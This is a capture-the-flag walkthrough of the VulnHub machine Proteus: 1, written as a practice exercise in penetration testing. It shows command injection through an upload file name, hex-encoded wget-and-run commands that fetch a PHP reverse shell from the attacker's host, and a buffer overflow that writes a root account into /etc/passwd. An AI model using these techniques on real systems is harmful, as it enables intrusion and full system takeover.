Capture the flag (CTF)

Proteus: 1 – CTF Walkthrough

November 6, 2017 by Chiragh Dewan

Proteus is a relatively new machine that came on VulnHub. Created by Ivanvza, it surfaced on June 7th, 2017. It can be downloaded from https://www.vulnhub.com/entry/proteus-1,193/

The objective is to get root privileges and get the flag.

Downloaded and fired up, it presents with a login screen with no other information at all apart from telling us that it is a Corporate Malware Validator:

So, heading back to our attacking machine, Kali 2017.1, I run a simple command:

$ nmap 172.16.92.0/24

Now that we know the IP address of our target machine, let’s start by scanning it and see if we can get anything else:

For this case, I am using Zenmap, a GUI version of Nmap. The scan shows us that there are 2 ports open:

  • Port 22 – Used for SSH
  • Port 80 – Used to serve a web application

Let’s head to its port 80 and see what’s the web application we are dealing with:

On uploading a random file, I get the following message:

On uploading the right file type (application/x-executable, application/x-sharedlib formats supported) which was a sample C program I whipped up, I got the following on uploading it:

Looking at the output, it is clear that the system is running strings and objdump commands on the uploaded files. After doing some more research, I found out that ‘.‘ Moreover, ‘/‘ do not work.

This made me wonder whether I will be able to exploit it using RCE (Remote Code Execution). I thought to test it out with a basic Linux command.

To do that, I used Burp Suite and added the command id; after the file name that I was uploading:

and forwarded the request:

Now I know that RCE will work.

Now, time to add a shell.

I used a PHP-reverse-shell. However, we cannot upload the shell directly. I tried converting the commands into HEX and sent them the same way I sent the earlier commands.

I’ll be using the following format to send the request:

Echo HEX_CODE | xxd -r -p

And I’ll be converting the following commands into HEX:

wget http://172.16.92.141/shell.txt -O /tmp/shell.php

php /tmp/shell.php;

and their final code converts to be:

echo 7767657420687474703a2f2f3137322e31362e39322e3134312f7368656c6c2e747874202d4f202f746d702f7368656c6c2e706870 | xxd -r -p

echo 706870202F746D702F7368656C6C792E7068703B | xxd -r -p

I appended both commands the same way I appended the id command earlier and after running the second command, I got a reverse shell:



After digging for a little while, I came across a file called admin_login_logger and admin_login_request.js

Since I did not want to go back to the web application, I started to play around the first file.

After playing it with on my system, I realized that the file creates a new file at /var/log/proteus/log with the parameter we pass. For a long time, I played around with it, giving it various kinds of parameters, until, I entered a long parameter which crashed the file. To create that, I used a tool called pattern.py which can be found at https://raw.githubusercontent.com/Svenito/exploit-pattern/master/pattern.py

I ran the following command:

$ ./admin_login_logger ‘pattern.py 1024’


This made the file crash. After inspecting, I saw that a file was created in my current directory with the name first few characters of the string passed which made me wonder if I can figure out the extent of characters the file can take and use that to create a user on the target machine.

Upon running the following command:

$ pattern.py Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0A

I saw that it told me the first occurrence was at position 456. Time to exploit this:

To add a user, I need a password to enter in /etc/passwd


So, I added the following in /etc/passwd:

Chiragh:
$1$.T8Oa/jC$BSMBICcTHivnsn3RAXO6N/…:0:0::/tmp

Time to run the exploit:

$ ./admin_login_logger ‘chiragh:$1$.T8Oa/jC$BSMBICcTHivnsn3RAXO6N/…:0:0::/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/etc/passwd’

Followed by:

$ su chiragh

And we are root!!


The flag is a PNG image which can be found at /root. I uploaded the image and served a PHP server.

The following links can help understand few ways we used to crack the target machine:

http://www.unit-conversion.info/texttools/hexadecimal/

Posted: November 6, 2017
Author
Chiragh Dewan
View Profile

A creative problem-solving full-stack web developer with expertise in Information Security Audit, Web Application Audit, Vulnerability Assessment, Penetration Testing/ Ethical Hacking as well as previous experience in Artificial Intelligence, Machine Learning, and Natural Language Processing. He has also been recognised by various companies such as Facebook, Google, Microsoft, PayPal, Netflix, Blackberry, etc for reporting various security vulnerabilities. He has also given various talks on Artificial Intelligence and Cyber Security including at an TEDx event.

Leave a Reply

Your email address will not be published.